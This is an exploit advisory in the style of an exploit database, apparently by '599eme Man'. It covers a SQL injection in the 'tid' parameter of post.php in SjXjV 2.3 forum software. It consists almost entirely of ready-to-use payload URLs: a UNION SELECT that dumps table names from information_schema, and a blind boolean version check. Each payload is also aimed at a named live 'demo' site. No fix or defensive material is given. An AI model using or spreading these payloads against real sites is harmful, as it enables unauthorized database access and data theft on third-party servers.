SjXjV version 2.3 suffers from a remote SQL injection vulnerability.
031e873aac9e8ae9bc4cd6cb1cab1c02803fe972fb8d73230dd8a37ef5f6a825
_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_
_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_
_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_
_____0______0______0__0______0___0__0________0___0__00000__0___0_
_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_
_________________________________________________________________
# [+] SjXjV-2.3 (post tid) Remote SQL Injection Vulnerabilities
# [+] Software : SjXjV-2.3
# [+] Download : http://www.shijiexuexi.cn
# [+] Author : 599eme Man
# [+] Contact : Flouf@live.fr
#
#[------------------------------------------------------------------------------------]
#
# [+] Vulnerability
#
# [+] SQL
#
# - http://site.com/post.php?fid=41&tid=-51%20union%20select%201,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables+where+table_schema%20=database%28%29--
#
# [+] Demo
#
# - http://zeed.tk/bbs/wap/post.php?fid=41&tid=-51%20union%20select%201,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables+where+table_schema%20=database%28%29--
#
# [+] Blind SQL
#
# - http://site.com/post.php?fid=41&tid=51 and substring(@@version,1,1)=5
#
# [+] Demo
#
# - http://zeed.tk/bbs/wap/post.php?fid=41&tid=51 and substring(@@version,1,1)=5
#
#[------------------------------------------------------------------------------------]
#
#########################################################################################################